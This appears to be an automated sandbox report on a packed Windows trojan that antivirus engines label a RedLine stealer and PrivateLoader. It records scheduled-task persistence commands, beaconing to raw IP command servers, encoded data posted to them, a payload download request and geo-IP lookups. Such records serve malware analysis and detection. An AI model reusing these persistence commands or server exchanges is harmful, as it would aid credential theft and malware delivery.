1 1 0
section {u'size_of_data': u'0x003dd400', u'virtual_address': u'0x00220000', u'entropy': 7.904248015521005, u'name': u'.vmp#2', u'virtual_size': u'0x003dd340'} entropy 7.90424801552 description A section with a high entropy has been found
section {u'size_of_data': u'0x0001fc00', u'virtual_address': u'0x005ff000', u'entropy': 7.417326874929454, u'name': u'.rsrc', u'virtual_size': u'0x000335e0'} entropy 7.41732687493 description A section with a high entropy has been found
entropy 0.999388229536 description Overall entropy of this PE file is high
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
section .vmp#0 description Section name indicates VMProtect
section .vmp#1 description Section name indicates VMProtect
section .vmp#2 description Section name indicates VMProtect
host 171.22.28.226
host 193.42.32.118
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
Time & API Arguments Status Return Repeated

WSASend

 buffer: oke›r¥Ñƒ9µ×ñކ%Qå0ƒ€ôu÷·lDØßcõ>/5 ÀÀÀ À 28*ÿ telegram.org  
socket: 388
0 0

WSASend

 buffer: 51e›s$`LX~)Í¢Õ›K{É2Oυ G3nB«  ÿ
socket: 388
0 0

WSASend

 buffer: nje›sLuájØôí3׳Wƒñ¸ïþRz ê";B >bh8/5 ÀÀÀ À 28)ÿ twitter.com  
socket: 500
0 0

WSASend

 buffer: 51e›sÿ0ÅêˆY£t Ú4œÿhO,J´d<YՇ’?8  ÿ
socket: 500
0 0

WSASend

 buffer: lhe›s/hTá¶ÅnS`ÿ2ýÞxJ-qñ{|™>pў/5 ÀÀÀ À 28'ÿ yandex.ru  
socket: 504
0 0

WSASend

 buffer: FBAº­fðCÚZ‘ƒƒï:~Ø­ûb¾iy7 i48æÎѧˆTÀƒwÌ¢ÜToé%ƒGŸ©‹ªmž6¡lUÀËÂ=‡20BŸÌª³¥xz~\áÀ_§J`œœ¾ï“â^U—Ö×=oK¿½àÂRH?ƒ´Mý…\
socket: 504
0 0

WSASend

 buffer: àŒ—îU®ë…O´åûª,%’(`<Ð%;]£q’j»ßyдœ\ŒÄi,C-éÑ$ŌžQá(|ϳÿ])ÄÐ\9;½óì´(I×®RïøïX‡°Â"3«I»%‹©úMŽÆúÎ \ù¥ï½¦怄 ôµOÉiën,ܧa¸ƒ˜Õ£35©\Ý7A‰-¬>ËÆ­Òü(ÊÁG[hÇ~] õdÑ œjÖ¥†^÷ÃGš(ay:¡¶`1ÿj~ä~£¡ãt=e×F÷>ËRÀ«ªöÒ(ÛO@
socket: 504
0 0

WSASend

 buffer: jfe›udçŸ sqßÁð´3’ú:SyzÊ*42$¿vû–M/5 ÀÀÀ À 28%ÿ dzen.ru  
socket: 932
0 0

WSASend

 buffer: FBAÝo%6âp“ââÜ/ïqáÖdóøÞµA#÷Í®<æHõ ^'Ñí®Û(­@‹íƒ ¨`ëг>pPõ@jã`0‹õ1°k${†mfàQUû`S’‚Qc”f¶ʪ%§ŸTX1j«3JvL³ߤ/CÑ
socket: 932
0 0

WSASend

 buffer: à³[¾|…Ä(ý]Å.¡e(ÿY"ù>—†£7LÚá,JÞҗËC4ÕÝ' 5ÝFu CƒœIô6D?y67\·qЧAƒ¬ÿaú|¸‡ÏñÐÄô[¥4^0:‹Ij¥oU½Ý_ƒJ0ºÐÑ^eäB™ÑOâÀ‰ӛ$×òZ@€/W¿)ò+*£S¨ÿ&Oè—SΒÌŸ*ðÅ%J–óÌ=ˆÉŒÎvh41–½E þèI¿}‹µ\;N)„nÜâïþ>ÇÙ²p.ß¹ÞÕ[3tânÐKîÆúØӚæ<Oë
socket: 932
0 0

WSASend

 buffer: yue›vf|î­Ô™*±-ÀNÁù¨H#–HÚlÇ´ˆ¾á/5 ÀÀÀ À 284ÿsso.passport.yandex.ru  
socket: 936
0 0

WSASend

 buffer: FBAI”ýá+·$‚˜¾o̾tä€Ý¡.R"`~pŽ«;–)TVü}ÉÙâÅ&é&) ‘A¾ÅIàõª÷ö’0Ø7͘ëÊjI°Öw= Ž®Ñê&) ˆVL'ùÑws—ÿNÊÂ:u‚GaP_`¶T
socket: 936
0 0

WSASend

 buffer: @2‘½êã²öÈÅ5×+~Yßùû¸ÖòU~ªú­)ÓZ£œšÃ1NP"¶8¡Jp”˜¬p ýDÝ<¾Š¤ r P CóÒÆCHtªEJ«ÚÕHÖ ©¸ukœ¢E¡ÓÈsiz^ôÌC¾¥EŒöRº»H¸ÁrÏ"8~]_Šwe–tÜÿÝò©Ð-­„B*ò§ê>¡÷›³9¡`Ÿ7Ï S!ϟ€aG•Mv–s͛ʫ䟤~ÙF¥Ñ÷%J:SûlXh+ìùÇ ®°‚GÉ2Óč©õß‘ [ÞÓÉ÷ö&9§Ó;¶0XAkÔ%T`ùŒž >½È¹›Ø÷VË­8sº– ™(I• kB7fÐ܊{P»ƒ`TÔÙ5£èkR²çQêZ¯eø©ŠB OMé׼ژ,»úû“5hpkžhþەçNOæVc[¸ˆóŠ^r_+œÏ"h;6 eÌ­­œ‚UoôƒÏoÚrøˆérµ³Eöͬ;-ö' &åd•+ËëœS§37Ç«¶QZÚ%ÙíƒÌã+‚7§ËóMS°xûôxeäÓrðõE¾günMÓGpc7CÍûk4&+Òu/ØikŸíe·hùz+…ôF#ð¹&Ó¶Õ|UCkÒÙ[~IAOwìÖèy)Y0oC°FÊÓ?Jùø“c8¢ó^ÌÚå{¤=–ì(Ò»ÛZ6%ÕÑca;¯TöcÐdFE@·rЇ¹Füä·é–š0JŽ›Ÿ!|<ÒÞ
socket: 936
0 0

WSASend

 buffer:  ײøÄZÎ(†Z. dEÕò ÐȯˆÇÁí;‚xéL
socket: 936
0 0

WSASend

 buffer:  BÒ"$fû@f£ Œ`ïNv¿ºÄé9Û*
socket: 936
0 0

WSASend

 buffer: GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive Host: 193.42.32.118
socket: 944
0 0

WSASend

 buffer: POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 25 Host: 193.42.32.118
socket: 944
0 0

WSASend

 buffer: data=m7moirmur7WzsqDt8u8=
socket: 944
0 0

WSASend

 buffer: lhe›x@jX~‰’‚›¨À¯ú¸§ûb2*=ëÇž/5 ÀÀÀ À 28'ÿ ipinfo.io  
socket: 996
0 0

WSASend

 buffer: 51e›xM_¨‘åW¸w¥Øüã1ˆ/0)7T<Ý,R.ì4a  ÿ
socket: 996
0 0

WSASend

 buffer: lhe›xÙÆbC“ìº÷ÉãKè`îݱ‰C›«ÿ4;/5 ÀÀÀ À 28'ÿ db-ip.com  
socket: 1000
0 0

WSASend

 buffer: FBA"¤a?V¿vCWÿÍU.‚.8 ½‰£õË(\Y~Z=ZkŠV~ÁádnȬ›@'Kœì–6À«>*ÿ(M‘ý0†º‘ÒÑÊÒ-øÐZuè ¼£En•¶1ÔÙjWúêÁ¢†¸ïº(dÍ[)]Úi˜
socket: 1000
0 0

WSASend

 buffer: à1I•áÖˆ†(W*'‹sôpß9?ND^ڑ¢½§Ü-…+÷a‹³·TúÊáN~Ã4¢Þj’¬+Öô¡¥Æa ¦Kj"‘çèüÑGÅ//( Ií2L¶¥‰‚°ï«ýþ4ÇSóðžuW4ˆÚsx(ü®@÷ ª4÷e uóŽ#,’Éoxzˆ«éÃì=6”®G ›•É¡þ‹ê¾õ棩ÿfr/À×Πh]· å`¡OÓÚÁ›Üþg 3[G§ZÔ¨Yw6¿òß4•Oc—x˜ëMôÂQdBÖÕ._å4
socket: 1000
0 0

WSASend

 buffer: ple›xòõ=ͤ9ë€zöºàa熎ie<4‹ý)I_/5 ÀÀÀ À 28+ÿ api.db-ip.com  
socket: 1008
0 0

WSASend

 buffer: FBAr’H<-èhšÛ„‚¨ªø^VÅ]êÖAF•Oƒót!Hl_{’Ü ‘dÖ(êÖʬ‰qÆöÿP~Â/§¨Yô0eñè`E÷*6•±€!¼¬–”¢™krɦŽšª‚'͂JrúÛQ•ùQJž-r
socket: 1008
0 0

WSASend

 buffer: @²"Ô"DÈmÇNažÀ!”¨lû–qé"sú÷ð1…ÄE˜È)OÑå5çÀ¬âš—$¦ rZ”ÅÞäiåzÁÛ«õþT …yõ3NEÉS`pÍg&w˜ðWMDo¦—ŒÄ^R\ûÐò½‚ÿìb»}X¼¥¡<ϼqBñZ•edúë û×åw±¥¶+•í…Ґ|܉‹‹. æ’"Ћ®ÎìÙØFJÅÜ÷H™Øæä# *vFI ØØ­ÇXEÞEVÕ^ŸÄQí‘=g •[>,o¼­x1=6™¼!gùXú ¾‹Sn‡ª&-¿Tî"®¬Á}杅+të—rZ¡¨‚!ÇÜ`£/<,ÍæMl¥©Ð«&÷Žb;8†r6͔wˆjº›oí͎
socket: 1008
0 0

WSASend

 buffer: GET /geoip/v2.1/city/me HTTP/1.1 Connection: Keep-Alive Referer: https://www.maxmind.com/en/locate-my-ip-address User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.maxmind.com
socket: 1016
0 0

WSASend

 buffer: POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 13 Host: 193.42.32.118
socket: 944
0 0

WSASend

 buffer: data=m7molYw=
socket: 944
0 0

WSASend

 buffer: POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 69 Host: 193.42.32.118
socket: 944
0 0

WSASend

 buffer: data=m7mokLO9uLmukLWyt6C4uem57-W_5L7lvurkvr_uv-657-3ovum97b_s6OrluKA=
socket: 944
0 0

InternetConnectA

 username:
service: 3
hostname: 171.22.28.226
internet_handle: 0x00cc0004
flags: 0
password:
port: 80
1 13369352 0

HttpOpenRequestA

 connect_handle: 0x00cc0008
http_version:
flags: 2147483648
http_method: HEAD
referer:
path: /download/WWW14_64.exe
1 13369356 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
Bkav W32.AIDetectMalware
MicroWorld-eScan Trojan.GenericKD.69522329
FireEye Generic.mg.b9a096baebdf8e44
McAfee Artemis!B9A096BAEBDF
Malwarebytes Spyware.RedLineStealer
Sangfor Trojan.Win32.Agent.Vmp6
Alibaba Trojan:Win32/VMProtect.9f1fb639
BitDefenderTheta Gen:NN.ZexaF.36738.@J0@aKjs31jO
Cyren W32/ABRisk.NYOS-2315
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/Packed.VMProtect.AU suspicious
APEX Malicious
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.GenericKD.69522329
Avast Win32:DropperX-gen [Drp]
Emsisoft Trojan.GenericKD.69522329 (B)
DrWeb Trojan.Siggen21.33425
TrendMicro Trojan.Win32.PRIVATELOADER.YXDI3Z
McAfee-GW-Edition BehavesLike.Win32.Generic.wc
Trapmine malicious.high.ml.score
Sophos Mal/Generic-S
SentinelOne Static AI - Suspicious PE
Webroot W32.Trojan.Gen
Gridinsoft Malware.Win32.Gen.bot
Microsoft Trojan:Win32/Znyonm
ZoneAlarm UDS:DangerousObject.Multi.Generic
GData Trojan.GenericKD.69522329
Google Detected
VBA32 BScope.TrojanPSW.Coins
MAX malware (ai score=81)
Cylance unsafe
TrendMicro-HouseCall Trojan.Win32.PRIVATELOADER.YXDI3Z
Rising Trojan.Generic@AI.100 (RDML:OleDoKY/5poeqwjOhiYanA)
Fortinet PossibleThreat.MU
AVG Win32:DropperX-gen [Drp]
DeepInstinct MALICIOUS